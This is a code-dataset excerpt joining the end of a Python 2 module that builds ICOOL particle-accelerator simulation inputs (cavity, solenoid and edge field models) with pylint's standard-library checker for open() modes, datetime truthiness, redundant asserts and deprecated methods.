'freq': {
'pos': 2, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 4, 'type': 'Real', 'doc': ''},
'file_no': {
'pos': 8, 'type': 'Real', 'doc': ''},
'field_strength_norm': {
'pos': 9, 'type': 'Real', 'doc': ''},
'rad_cut': {
'pos': 10, 'type': 'Real', 'doc': ''},
'axial_dist': {
'pos': 11, 'type': 'Real', 'doc': ''},
'daxial_sym': {
'pos': 12, 'type': 'Real', 'doc': ''}}},
'ilpoly': {
'desc': 'Induction linac model - waveform from user-supplied polynomial coefficients',
'doc': '', 'icool_model_name': 6,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'time_offset': {
'pos': 2, 'type': 'Real', 'doc': ''},
'gap': {
'pos': 3, 'type': 'Real', 'doc': ''},
'time_reset': {
'pos': 4, 'type': 'Real', 'doc': ''},
'v0': {
'pos': 5, 'type': 'Real', 'doc': ''},
'v1': {
'pos': 6, 'type': 'Real', 'doc': ''},
'v2': {
'pos': 7, 'type': 'Real', 'doc': ''},
'v3': {
'pos': 8, 'type': 'Real', 'doc': ''},
'v4': {
'pos': 9, 'type': 'Real', 'doc': ''},
'v5': {
'pos': 10, 'type': 'Real', 'doc': ''},
'v6': {
'pos': 11, 'type': 'Real', 'doc': ''},
'v7': {
'pos': 12, 'type': 'Real', 'doc': ''},
'v8': {
'pos': 13, 'type': 'Real', 'doc': ''}}},
'ilgen': {
'desc': 'Induction linac model - waveform from internally generated waveform',
'doc': '',
'icool_model_name': 7,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'num_gaps': {
'pos': 2, 'type': 'Real', 'doc': ''},
'start_volt': {
'pos': 3, 'type': 'Real', 'doc': ''},
'volt_swing': {
'pos': 4, 'type': 'Real', 'doc': ''},
'time_offset': {
'pos': 5, 'type': 'Real', 'doc': ''},
'kin': {
'pos': 6, 'type': 'Real', 'doc': ''},
'pulse_dur': {
'pos': 7, 'type': 'Real', 'doc': ''},
'slope': {
'pos': 8, 'type': 'Real', 'doc': ''},
'bins': {
'pos': 9, 'type': 'Real', 'doc': ''},
'gap_len': {
'pos': 10, 'type': 'Real', 'doc': ''},
'file_num': {
'pos': 11, 'type': 'Real', 'doc': ''},
'kill': {
'pos': 12, 'type': 'Real', 'doc': ''},
'restart': {
'pos': 13, 'type': 'Real', 'doc': ''}}},
'ilfile': {
'desc': 'Induction linac model - Waveform from user-supplied file',
'doc': '',
'icool_model_name': 8,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'time_offset': {
'pos': 2, 'type': 'Real', 'doc': ''},
'gap': {
'pos': 3, 'type': 'Real', 'doc': ''},
'time_reset': {
'pos': 4, 'type': 'Real', 'doc': ''},
'file_num_wav': {
'pos': 5, 'type': 'Real', 'doc': ''},
'poly_order': {
'pos': 6, 'type': 'Real', 'doc': ''},
'file_num_out': {
'pos': 7, 'type': 'Real', 'doc': ''},
'time_inc': {
'pos': 8, 'type': 'Real', 'doc': ''}}},
'sec_pill_circ': {
'desc': 'Sector-shaped pillbox cavity (circular cross section)',
'doc': '',
'icool_model_name': 9,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'freq': {
'pos': 2, 'type': 'Real', 'doc': ''},
'grad': {
'pos': 3, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 4, 'type': 'Real', 'doc': ''}}},
'var_pill': {
'desc': 'Variable {frequency gradient} pillbox cavity',
'doc': '',
'icool_model_name': 10,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'phase': {
'pos': 2, 'type': 'Real', 'doc': ''},
'num_wavelengths': {
'pos': 3, 'type': 'Real', 'doc': ''},
'reset_parms': {
'pos': 4, 'type': 'Real', 'doc': ''},
'buncher_len': {
'pos': 5, 'type': 'Real', 'doc': ''},
'g0': {
'pos': 6, 'type': 'Real', 'doc': ''},
'g1': {
'pos': 7, 'type': 'Real', 'doc': ''},
'g2': {
'pos': 8, 'type': 'Real', 'doc': ''},
'phase_model': {
'pos': 9, 'type': 'Real', 'doc': ''}}},
'straight_pill': {
'desc': 'Straight pillbox or SuperFish cavity in dipole region',
'doc': '',
'icool_model_name': 11,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'freq': {
'pos': 2, 'type': 'Real', 'doc': ''},
'grad': {
'pos': 3, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 4, 'type': 'Real', 'doc': ''},
'radial_offset': {
'pos': 5, 'type': 'Real', 'doc': ''},
'axial_length': {
'pos': 6, 'type': 'Real', 'doc': ''},
'cavity_type': {
'pos': 7, 'type': 'Real', 'doc': ''},
'file_num': {
'pos': 8, 'type': 'Real', 'doc': ''},
'sf_field_norm': {
'pos': 9, 'type': 'Real', 'doc': ''},
'sf_rad_cut': {
'pos': 10, 'type': 'Real', 'doc': ''},
'sf_axial_disp': {
'pos': 11, 'type': 'Real', 'doc': ''},
'sf_axial_sym': {
'pos': 12, 'type': 'Real', 'doc': ''}}},
'sec_pill_rec': {
'desc': 'Variable {frequency gradient} pillbox cavity',
'doc': '', 'icool_model_name': 12,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'freq': {
'pos': 2, 'type': 'Real', 'doc': ''},
'grad': {
'pos': 3, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 4, 'type': 'Real', 'doc': ''},
'rad_offset': {
'pos': 5, 'type': 'Real', 'doc': ''},
'width': {
'pos': 6, 'type': 'Real', 'doc': ''},
'height': {
'pos': 7, 'type': 'Real', 'doc': ''}}},
'open_cell_stand': {
'desc': 'Open cell standing wave cavity',
'doc': '',
'icool_model_name': 13,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'freq': {
'pos': 2, 'type': 'Real', 'doc': ''},
'grad': {
'pos': 3, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 4, 'type': 'Real', 'doc': ''},
'focus_flag': {
'pos': 5, 'type': 'Real', 'doc': ''}}}}
def __init__(self, **kwargs):
Field.__init__(self, 'ACCEL', kwargs)
def __call__(self, **kwargs):
Field.__call__(self, kwargs)
def __setattr__(self, name, value):
if name == 'ftag':
if value == 'ACCEL':
object.__setattr__(self, name, value)
else:
# Should raise exception here
print '\n Illegal attempt to set incorrect ftag.\n'
else:
Field.__setattr__(self, name, value)
def __str__(self):
return Field.__str__(self)
def gen_fparm(self):
Field.gen_fparm(self)
def gen(self, file):
Field.gen(self)
class Sol(Field):
"""
SOL solenoid field
1 model level
1: Bz with constant central region + linear ends
2: dTANH(z) Bz dependence
3: field from sum of circular current loops
4: field from annular current sheet
5: field from thick annular current block
6: interpolate field from predefined USER r-z grid
7: tapered radius
8: hard-edge with adjustable end fields
9: determine field from file of Fourier coefficients
10: determine field from file of on-axis field
For model = 1
2 field strength [T]
3 length of central region, CLEN[m] (You can use this to get a tapered field profile)
4 length of entrance end region, ELEN1 [m] This is the displacement of the
upstream end of the solenoid from the start of the region.
5 constant offset for Bz [T]
Use parameter 5 to get an indefinitely long, constant solenoidal field.
6 length of exit end region, ELEN2 [m].
For a symmetric field, set SLEN =CLEN + ELEN1 + ELEN2. Hard-edge field models
can include the focusing effects of the missing fringe field by using EDGE commands
before and after the hard-edge field region.
For model = 2
2 field strength [T]
3 length of central region, CLEN[m]
4 length for end region, ELEN [m] (This is the displacement of the
upstream end of the solenoid from the start of the region; for a symmetric field, set SLEN =
CLEN + 2*ELEN.)
5 order of vector potential expansion {1, 3, 5, 7}
6 end attenuation length, [m] (Set larger than maximum beam size)
7 constant offset for Bs [T]
For model = 3
2 field strength [T]
3 length of central region, CLEN[m] (This is the region over which the coils are
distributed)
4 length for end region, ELEN[m] (This is the displacement of the
upstream end of the solenoid from the start of the region; for a symmetric field, set SLEN =
CLEN + 2*ELEN.)
5 # of coils loops (equi-spaced over CLEN)
6 radius of coils [m]
For a symmetric field with 1 loop, set ELEN=0.5 SLEN.
For model = 4
2 field strength [T]
3 length of sheet [m]
4 z offset of center of sheet from start of region [m]
5 radius of sheet [m]
For model = 5
2 field strength [T]
3 length of block [m]
4 z offset of center of block from start of region [m]
5 inner radius of block [m]
6 outer radius of block[m]
For model = 6
2 grid ##of user-supplied field {1-4}
3 interpolation level {1-3}
1: bi-linear
2: bi-quadratic polynomial
3: bi-cubic polynomial
The required format of the field map is
title (A80)
# of z grid points (I) {1-5000}
# of r grid points (I) {1-100}
i, j, zi, rj, BZi,j, BRi,j (I, R)
2 Bc [T] (flat central field strength)
3 Rc [m] (flat central coil radius)
4 Lc [m] (central field length)
5 B1 [T] (starting field strength)
6 R1 [m] (starting coil radius)
7 L1 [m] (length of entrance transition region)
8 B2 [T] (ending field strength)
9 R2 [m] (ending coil radius)
10 L2 [m] (length of exit transition region)
This model applies a geometry cut on particles whose radius exceeds the specified radial taper.
"""
begtag = 'SOL'
endtag = ''
models = {
'model_descriptor': {
'desc': 'Name of model parameter descriptor',
'name': 'model',
'num_parms': 15,
'for001_format': {
'line_splits': [15]}},
'bz': {
'desc': 'Bz with constant central region + linear ends',
'doc': '',
'icool_model_name': 1,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'strength': {
'pos': 2, 'type': 'Real', 'doc': 'Field strength [T] '},
'clen': {
'pos': 3, 'type': 'Real', 'doc': 'Length of central region, CLEN[m] (You can use this to get a tapered field profile)'},
'elen1': {
'pos': 4, 'type': 'Real', 'doc': 'Length of entrance end region, ELEN1 [m]. This is the displacement of the '
'upstream end of the solenoid from the start of the region'},
'offset': {
'pos': 5, 'type': 'Real', 'doc': 'Use parameter 5 to get an indefinitely long, constant solenoidal field.'},
'elen2': {
'pos': 6, 'type': 'Real', 'doc': 'Length of exit end region, ELEN2 [m]. For a symmetric field, set:'
'SLEN =CLEN + ELEN1 + ELEN2. '
'Hard-edge field models can include the focusing effects of the missing fringe '
'field by using EDGE commands before and after the hard-edge field region'}}},
'dtanh': {
'desc': 'dTANH(z) Bz dependence',
'doc': '',
'icool_model_name': 2,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'strength': {
'pos': 2, 'type': 'Real', 'doc': 'Field strength [T] '},
'clen': {
'pos': 3, 'type': 'Real', 'doc': 'Length of central region, CLEN[m] (You can use this to get a tapered field '
'profile)'},
'elen': {
'pos': 4, 'type': 'Real', 'doc': 'Length for end region, ELEN [m] (This is the displacement of the upstream end '
'of the solenoid from the start of the region; for a symmetric field, '
'set SLEN =CLEN + 2*ELEN.)'},
'order': {
'pos': 5, 'type': 'Real', 'doc': 'Order of vector potential expansion {1, 3, 5, 7}'},
'att_len': {
'pos': 6, 'type': 'Real', 'doc': 'End attenuation length, [m] (Set larger than maximum beam size) '},
'offset': {
'pos': 7, 'type': 'Real', 'doc': 'Constant offset for Bs [T]. For a symmetric field, set'}}},
'circ': {
'desc': 'Field from sum of circular current loops',
'doc': 'For a symmetric field with 1 loop, set ELEN=0.5 SLEN.',
'icool_model_name': 3,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'strength': {
'pos': 2, 'type': 'Real', 'doc': 'Field strength [T] '},
'clen': {
'pos': 3, 'type': 'Real', 'doc': 'Length of central region, CLEN[m]. '
'(This is the region over which the coils are distributed))'},
'elen': {
'pos': 4, 'type': 'Real', 'doc': 'Length for end region, ELEN [m] (This is the displacement of the upstream end of '
'the solenoid from the start of the region; for a symmetric field, '
'set SLEN =CLEN + 2*ELEN.)'},
'loops': {
'pos': 5, 'type': 'Real', 'doc': 'Number of coil loops'},
'radius': {
'pos': 6, 'type': 'Real', 'doc': 'Radius of coils [m]'}}},
'sheet': {
'desc': 'Field from annular current sheet',
'doc': '',
'icool_model_name': 4,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'strength': {
'pos': 2, 'type': 'Real', 'doc': 'Field strength [T] '},
'length': {
'pos': 3, 'type': 'Real', 'doc': 'Length of sheet [m] '},
'z_offset': {
'pos': 4, 'type': 'Real', 'doc': 'z offset of center of sheet from start of region [m]'},
'radius': {
'pos': 5, 'type': 'Real', 'doc': 'Radius of sheet [m]'}}},
'block': {
'desc': 'Field from thick annular current block',
'doc': '',
'icool_model_name': 5,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'strength': {
'pos': 2, 'type': 'Real', 'doc': 'Field strength [T] '},
'length': {
'pos': 3, 'type': 'Real', 'doc': 'Length of block [m] '},
'z_offset': {
'pos': 4, 'type': 'Real', 'doc': 'z offset of center of block from start of of region [m]'},
'inner': {
'pos': 5, 'type': 'Real', 'doc': 'Inner radius of block [m]'},
'outer': {
'pos': 6, 'type': 'Real', 'doc': 'Outer radius of block [m]'}}},
'interp': {
'desc': 'Interpolate field from predefined USER r-z grid',
'doc': 'The required format of the field map is:\n'
'title (A80)\n'
'# of z grid points (I) {1-5000}\n'
'# of r grid points (I) {1-100}\n'
'i, j, zi, rj, BZi,j, BRi,j (I, R)', 'icool_model_name': 6,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'grid': {
'pos': 2, 'type': 'Real', 'doc': 'Grid ##of user-supplied field {1-4} '},
'level': {
'pos': 3, 'type': 'Int', 'doc': 'Interpolation level {1-3}:\n'
'1: bi-linear\n'
'2: bi-quadratic polynomial\n'
'3: bi-cubic polynomial ', 'min': 1, 'max': 3}}},
'tapered': {
'desc': 'Tapered radius', 'doc': 'This model applies a geometry cut on particles whose radius '
'exceeds the specified radial taper.',
'icool_model_name': 7, 'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'bc': {
'pos': 2, 'type': 'Real', 'doc': 'Bc [T] (flat central field strength) '},
'rc': {
'pos': 3, 'type': 'Real', 'doc': 'Rc [m] (flat central coil radius) '},
'lc': {
'pos': 4, 'type': 'Real', 'doc': 'Lc [m] (central field length) '},
'b1': {
'pos': 5, 'type': 'Real', 'doc': 'B1 [T] (starting field strength)'},
'r1': {
'pos': 6, 'type': 'Real', 'doc': 'R1 [m] (starting coil radius)'},
'l1': {
'pos': 7, 'type': 'Real', 'doc': 'L1 [m] (length of entrance transition region)'},
'b2': {
'pos': 8, 'type': 'Real', 'doc': 'B2 [T] (ending field strength)'},
'r2': {
'pos': 9, 'type': 'Real', 'doc': 'R2 [m] (ending coil radius)'},
'l2': {
'pos': 10, 'type': 'Real', 'doc': 'L2 [m] (length of exit transition region)'}}},
'edge': {
'desc': 'Hard-edge with adjustable end fields',
'doc': 'The focusing deficit is B2L - ∫B2 ds. The deficit is independent of the focusing effect chosen with parameter 3.',
'icool_model_name': 8,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'bs': {
'pos': 2, 'type': 'Real', 'doc': 'Bc [T] (flat central field strength) '},
'foc_flag': {
'pos': 3, 'type': 'Integer', 'doc': 'Flag on whether to include end focusing:\n'
'0: both entrance and exit focusing\n'
'1: exit focusing only\n'
'2: entrance focusing only\n'
'3: no edge focusing ',
'min': 0, 'max': 3},
'ent_def': {
'pos': 4, 'type': 'Real', 'doc': 'Focusing deficit at entrance [T2 m] '},
'ex_def': {
'pos': 5, 'type': 'Real', 'doc': 'focusing deficit at exit [T2 m]'}}},
'fourier': {
'desc': 'Determine field from file of Fourier coefficients',
'doc': 'The contents of the input file for0JK.dat is\n'
'1 title (A80)\n'
'2.1 period, λ (R)\n'
'2.2 field strength, S (R)\n'
'3 maximum Fourier order (I)\n'
'(4 repeated for each order)\n'
'4.1 order, m (I) {0 – 199}\n'
'4.2 cm (R)\n'
'4.3 dm (R)\n'
'The on-axis field is given by:\n'
'f (s) = S Σ ( cm COS(u) + dm SIN(u) )\n'
'where u = 2πms / λ.', 'icool_model_name': 9,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'order': {
'pos': 2, 'type': 'Integer', 'doc': 'Order of off-axis expansion (I) {1, 3, 5, 7} '},
'scale': {
'pos': 3, 'type': 'Real', 'doc': '(R) Multiplies field strength '}}},
'on_axis': {
'desc': 'Determine field from file of on-axis field',
'doc': '',
'icool_model_name': 10,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'file_num': {
'pos': 2, 'type': 'Integer', 'doc': 'File number JK for input data (I) File name is for0JK.dat'},
'order': {
'pos': 3, 'type': 'Integer', 'doc': 'Order of off-axis expansion (I) {1, 3, 5, 7} '},
'scale': {
'pos': 4, 'type': 'Real', 'doc': '(R) Multiplies field strength '}}}}
def __init__(self, **kwargs):
Field.__init__(self, 'SOL', kwargs)
def __call__(self, **kwargs):
Field.__call__(self, kwargs)
def __setattr__(self, name, value):
if name == 'ftag':
if value == 'SOL':
object.__setattr__(self, name, value)
else:
# Should raise exception here
print '\n Illegal attempt to set incorrect ftag.\n'
else:
Field.__setattr__(self, name, value)
def __str__(self):
return Field.__str__(self)
def gen_fparm(self):
Field.gen_fparm(self)
class Edge(Field):
"""
EDGE
1) edge type (A4) {SOL, DIP, HDIP,DIP3,QUAD,SQUA,SEX, BSOL,FACE}
2.1) model # (I) {1}
2.2-5) p1, p2, p3,p4 (R) model-dependent parameters
Edge type = SOL
p1: BS [T]
If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the exit edge.
Edge type = DIP
p1: BY [T]
Edge type = HDIP
p1: BX [T]
Edge type = DIP3
p1: rotation angle [deg]
p2: BY0 [T]
p3: flag 1:in 2:out
Edge type = QUAD
p1: gradient [T/m]
Edge type = SQUA
p1: gradient [T/m]
Edge type = SEX
p1: b2 [T/m2] (cf. C. Wang & L. Teng, MC 207)
Edge type = BSOL
p1: BS [T]
p2: BY [T]
p3: 0 for entrance face, 1 for exit face
Edge type = FACE
This gives vertical focusing from rotated pole faces.
p1: pole face angle [deg]
p2: radius of curvature of reference particle [m]
p3: if not 0 => correct kick by the factor 1 / (1+δ)
p4: if not 0 => apply horizontal focus with strength = (-vertical strength)
If a FACE command is used before and after a sector dipole ( DIP ), you can approximate a rectangular dipole field.
The DIP, HDIP, QUAD, SQUA, SEX and BSOL edge types use Scott Berg’s HRDEND routine to find the change in
transverse position and transverse momentum due to the fringe field.
"""
begtag = 'EDGE'
endtag = ''
models = {
'model_descriptor': {
'desc': 'Name of model parameter descriptor',
'name': 'model',
'num_parms': 6,
'for001_format': {
'line_splits': [
1,
5]}},
'sol': {
'desc': 'Solenoid',
'doc': '',
'icool_model_name': 'SOL',
'parms': {
'model': {
'pos': 1,
'type': 'String',
'doc': ''},
'bs': {
'pos': 3,
'type': 'Real',
'doc': 'p1: BS [T] '
'If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the '
'exit edge. (You can use this to get a tapered field profile)'}}},
}
def __init__(self, **kwargs):
Field.__init__(self, 'EDGE', kwargs)
def __call__(self, **kwargs):
Field.__call__(self, kwargs)
def __setattr__(self, name, value):
if name == 'ftag':
if value == 'EDGE':
object.__setattr__(self, name, value)
else:
# Should raise exception here
print '\n Illegal attempt to set incorrect ftag.\n'
else:
Field.__setattr__(self, name, value)
def __str__(self):
return Field.__str__(self)
def gen_fparm(self):
Field.gen_fparm(self)
class Output(PseudoRegion):
begtag = 'OUTPUT'
endtag = ''
num_params = 0
for001_format = {'line_splits': [0]}
command_params = {}
def __init__(self):
PseudoRegion.__init__(self, {})
class Comment(PseudoRegion):
def __init__(self, comment):
PseudoRegion.__init__(self, None)
self.comment = comment
class ICoolInput(ICoolObject):
"""This is the actual generated ICoolInput from command objects
Command objects include:
Title, Cont, Bmt, Ints, Nhs, Nsc, Nzh, Nrh, Nem, Ncv and region command objects.
Region command objects are the superclass of all region command objects and are
subclassed into RegularRegion and PsuedoRegion command objects.
RegularRegion command objects include: Section, Repeat, Cell and SRegion.
Section, Begs, Repeat and Cell will typically contain other allowed region command objects
such as SRegions as permitted by ICool.
PseudoRegion command objects include:
Aperture, Cutv, Denp, Dens, Disp, Dummy, Dvar, Edge, Grid, Output, Refp, Ref2, Reset, Rkick,
Rotate, Taper, Tilt, Transport, Background, Bfield, ! and &
title is a problem title object.
cont is a control variables object.
bmt is a beam generation variables object.
ints is a physics interactions control variables object.
nhs is a histogram defintion variables object.
nsc is a scatterplot definition variables object.
nzh is a z-history defintion variables object.
nrh is a r-history defintion variables object.
nem is an emittance plane definition variables object.
ncv is a covariance plane definition variables object.
sec is a region definition variables object, which contains all region definitions.
"""
command_params = {
'title': {'desc': 'Title of ICOOL simulation',
'doc': '',
'type': 'Title',
'req': True,
'default': None},
'cont': {'desc': 'ICOOL control variables',
'doc': '',
'type': 'Cont',
'req': True,
'default': None},
'bmt': {'desc': 'ICOOL beam generation variables',
'doc': '',
'type': 'Bmt',
'req': True,
'default': None},
'ints': {'desc': 'ICOOL interaction control variables',
'doc': '',
'type': 'Ints',
'req': True,
'default': None},
'nhs': {'desc': 'ICOOL histogram definition variables',
'doc': '',
'type': 'Nhs',
'req': False,
'default': Nhs()},
'nsc': {'desc': 'ICOOL scatterplot defintion variables',
'doc': '',
'type': 'Nsc',
'req': False,
'default': Nsc()},
'nzh': {'desc': 'ICOOL z history definition variables',
'doc': '',
'type': 'Nzh',
'req': False,
'default': Nzh()},
'nrh': {'desc': 'ICOOL r history definition variables',
'doc': '',
'type': 'Nrh',
'req': False,
'default': Nrh()},
'nem': {'desc': 'ICOOL emittance plane definition variables',
'doc': '',
'type': 'Nem',
'req': False,
'default': Nem()},
'ncv': {'desc': 'ICOOL covariance plane definition variables',
'doc': '',
'type': 'Ncv',
'req': False,
'default': Ncv()},
'section': {'desc': 'ICOOL cooling section region definition ',
'doc': '',
'type': 'Section',
'req': True,
'default': None}}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
ICoolObject.setdefault(self, kwargs)
def __call__(self, kwargs):
ICoolObject.__call__(self, kwargs)
def __str__(self):
return ICoolObject.__str__(self, 'CONT')
def add_title(self, title):
self.title = title
def add_cont(self, cont):
self.cont = cont
def add_sec(self, sec):
self.sec = sec
def gen(self, file):
if self.title is not None:
self.title.gen_for001(file)
if self.cont is not None:
self.cont.gen_for001(file)
if self.bmt is not None:
self.bmt.gen_for001(file)
if self.ints is not None:
self.ints.gen_for001(file)
if self.nhs is not None:
self.nhs.gen_for001(file)
if self.nsc is not None:
self.nsc.gen_for001(file)
if self.nzh is not None:
self.nzh.gen_for001(file)
if self.nrh is not None:
self.nrh.gen_for001(file)
if self.nem is not None:
self.nem.gen_for001(file)
if self.ncv is not None:
self.ncv.gen_for001(file)
if self.section is not None:
self.section.gen_for001(file)
|
jon2718/ipycool_2.0
|
ipycool_orig.py
|
Python
|
mit
| 161,517
|
[
"Gaussian"
] |
53cc6087e27d0e2adbbc6f81c38c3c7e4ae7ecf9326af3c61cee0497b9662c5e
|
# -*- coding: utf-8 -*-
# Copyright (c) 2013-2014 Google, Inc.
# Copyright (c) 2013-2014 LOGILAB S.A. (Paris, FRANCE) <contact@logilab.fr>
# Copyright (c) 2014-2016 Claudiu Popa <pcmanticore@gmail.com>
# Copyright (c) 2014 Vlad Temian <vladtemian@gmail.com>
# Copyright (c) 2014 Cosmin Poieana <cmin@ropython.org>
# Copyright (c) 2014 Arun Persaud <arun@nubati.net>
# Copyright (c) 2015 Cezar <celnazli@bitdefender.com>
# Copyright (c) 2015 Ionel Cristian Maries <contact@ionelmc.ro>
# Copyright (c) 2015 Chris Rebert <code@rebertia.com>
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/master/COPYING
"""Checkers for various standard library functions."""
import sys
import six
import astroid
from astroid.bases import Instance
from pylint.interfaces import IAstroidChecker
from pylint.checkers import BaseChecker
from pylint.checkers import utils
OPEN_FILES = {'open', 'file'}
UNITTEST_CASE = 'unittest.case'
if sys.version_info >= (3, 0):
OPEN_MODULE = '_io'
else:
OPEN_MODULE = '__builtin__'
def _check_mode_str(mode):
# check type
if not isinstance(mode, six.string_types):
return False
# check syntax
modes = set(mode)
_mode = "rwatb+U"
creating = False
if six.PY3:
_mode += "x"
creating = "x" in modes
if modes - set(_mode) or len(mode) > len(modes):
return False
# check logic
reading = "r" in modes
writing = "w" in modes
appending = "a" in modes
text = "t" in modes
binary = "b" in modes
if "U" in modes:
if writing or appending or creating and six.PY3:
return False
reading = True
if not six.PY3:
binary = True
if text and binary:
return False
total = reading + writing + appending + (creating if six.PY3 else 0)
if total > 1:
return False
if not (reading or writing or appending or creating and six.PY3):
return False
# other 2.x constraints
if not six.PY3:
if "U" in mode:
mode = mode.replace("U", "")
if "r" not in mode:
mode = "r" + mode
return mode[0] in ("r", "w", "a", "U")
return True
class StdlibChecker(BaseChecker):
__implements__ = (IAstroidChecker,)
name = 'stdlib'
msgs = {
'W1501': ('"%s" is not a valid mode for open.',
'bad-open-mode',
'Python supports: r, w, a[, x] modes with b, +, '
'and U (only with r) options. '
'See http://docs.python.org/2/library/functions.html#open'),
'W1502': ('Using datetime.time in a boolean context.',
'boolean-datetime',
'Using datetime.time in a boolean context can hide '
'subtle bugs when the time they represent matches '
'midnight UTC. This behaviour was fixed in Python 3.5. '
'See http://bugs.python.org/issue13936 for reference.',
{'maxversion': (3, 5)}),
'W1503': ('Redundant use of %s with constant '
'value %r',
'redundant-unittest-assert',
'The first argument of assertTrue and assertFalse is '
'a condition. If a constant is passed as parameter, that '
'condition will be always true. In this case a warning '
'should be emitted.'),
'W1505': ('Using deprecated method %s()',
'deprecated-method',
'The method is marked as deprecated and will be removed in '
'a future version of Python. Consider looking for an '
'alternative in the documentation.'),
}
deprecated = {
0: [
'cgi.parse_qs', 'cgi.parse_qsl',
'ctypes.c_buffer',
'distutils.command.register.register.check_metadata',
'distutils.command.sdist.sdist.check_metadata',
'tkinter.Misc.tk_menuBar',
'tkinter.Menu.tk_bindForTraversal',
],
2: {
(2, 6, 0): [
'commands.getstatus',
'os.popen2',
'os.popen3',
'os.popen4',
'macostools.touched',
],
(2, 7, 0): [
'unittest.case.TestCase.assertEquals',
'unittest.case.TestCase.assertNotEquals',
'unittest.case.TestCase.assertAlmostEquals',
'unittest.case.TestCase.assertNotAlmostEquals',
'unittest.case.TestCase.assert_',
'xml.etree.ElementTree.Element.getchildren',
'xml.etree.ElementTree.Element.getiterator',
'xml.etree.ElementTree.XMLParser.getiterator',
'xml.etree.ElementTree.XMLParser.doctype',
],
},
3: {
(3, 0, 0): [
'inspect.getargspec',
'unittest.case.TestCase._deprecate.deprecated_func',
],
(3, 1, 0): [
'base64.encodestring', 'base64.decodestring',
'ntpath.splitunc',
],
(3, 2, 0): [
'cgi.escape',
'configparser.RawConfigParser.readfp',
'xml.etree.ElementTree.Element.getchildren',
'xml.etree.ElementTree.Element.getiterator',
'xml.etree.ElementTree.XMLParser.getiterator',
'xml.etree.ElementTree.XMLParser.doctype',
],
(3, 3, 0): [
'inspect.getmoduleinfo',
'logging.warn', 'logging.Logger.warn',
'logging.LoggerAdapter.warn',
'nntplib._NNTPBase.xpath',
'platform.popen',
],
(3, 4, 0): [
'importlib.find_loader',
'plistlib.readPlist', 'plistlib.writePlist',
'plistlib.readPlistFromBytes',
'plistlib.writePlistToBytes',
],
(3, 4, 4): [
'asyncio.tasks.async',
],
(3, 5, 0): [
'fractions.gcd',
'inspect.getfullargspec', 'inspect.getargvalues',
'inspect.formatargspec', 'inspect.formatargvalues',
'inspect.getcallargs',
'platform.linux_distribution', 'platform.dist',
],
},
}
@utils.check_messages('bad-open-mode', 'redundant-unittest-assert',
'deprecated-method')
def visit_call(self, node):
"""Visit a CallFunc node."""
try:
for inferred in node.func.infer():
if inferred.root().name == OPEN_MODULE:
if getattr(node.func, 'name', None) in OPEN_FILES:
self._check_open_mode(node)
if inferred.root().name == UNITTEST_CASE:
self._check_redundant_assert(node, inferred)
self._check_deprecated_method(node, inferred)
except astroid.InferenceError:
return
@utils.check_messages('boolean-datetime')
def visit_unaryop(self, node):
if node.op == 'not':
self._check_datetime(node.operand)
@utils.check_messages('boolean-datetime')
def visit_if(self, node):
self._check_datetime(node.test)
@utils.check_messages('boolean-datetime')
def visit_ifexp(self, node):
self._check_datetime(node.test)
@utils.check_messages('boolean-datetime')
def visit_boolop(self, node):
for value in node.values:
self._check_datetime(value)
def _check_deprecated_method(self, node, inferred):
py_vers = sys.version_info[0]
if isinstance(node.func, astroid.Attribute):
func_name = node.func.attrname
elif isinstance(node.func, astroid.Name):
func_name = node.func.name
else:
# Not interested in other nodes.
return
# Reject nodes which aren't of interest to us.
acceptable_nodes = (astroid.BoundMethod,
astroid.UnboundMethod,
astroid.FunctionDef)
if not isinstance(inferred, acceptable_nodes):
return
qname = inferred.qname()
if qname in self.deprecated[0]:
self.add_message('deprecated-method', node=node,
args=(func_name, ))
else:
for since_vers, func_list in self.deprecated[py_vers].items():
if since_vers <= sys.version_info and qname in func_list:
self.add_message('deprecated-method', node=node,
args=(func_name, ))
break
def _check_redundant_assert(self, node, infer):
if (isinstance(infer, astroid.BoundMethod) and
node.args and isinstance(node.args[0], astroid.Const) and
infer.name in ['assertTrue', 'assertFalse']):
self.add_message('redundant-unittest-assert',
args=(infer.name, node.args[0].value, ),
node=node)
def _check_datetime(self, node):
""" Check that a datetime was infered.
If so, emit boolean-datetime warning.
"""
try:
infered = next(node.infer())
except astroid.InferenceError:
return
if (isinstance(infered, Instance) and
infered.qname() == 'datetime.time'):
self.add_message('boolean-datetime', node=node)
def _check_open_mode(self, node):
"""Check that the mode argument of an open or file call is valid."""
try:
mode_arg = utils.get_argument_from_call(node, position=1,
keyword='mode')
except utils.NoSuchArgumentError:
return
if mode_arg:
mode_arg = utils.safe_infer(mode_arg)
if (isinstance(mode_arg, astroid.Const)
and not _check_mode_str(mode_arg.value)):
self.add_message('bad-open-mode', node=node,
args=mode_arg.value)
def register(linter):
"""required method to auto register this checker """
linter.register_checker(StdlibChecker(linter))
|
axbaretto/beam
|
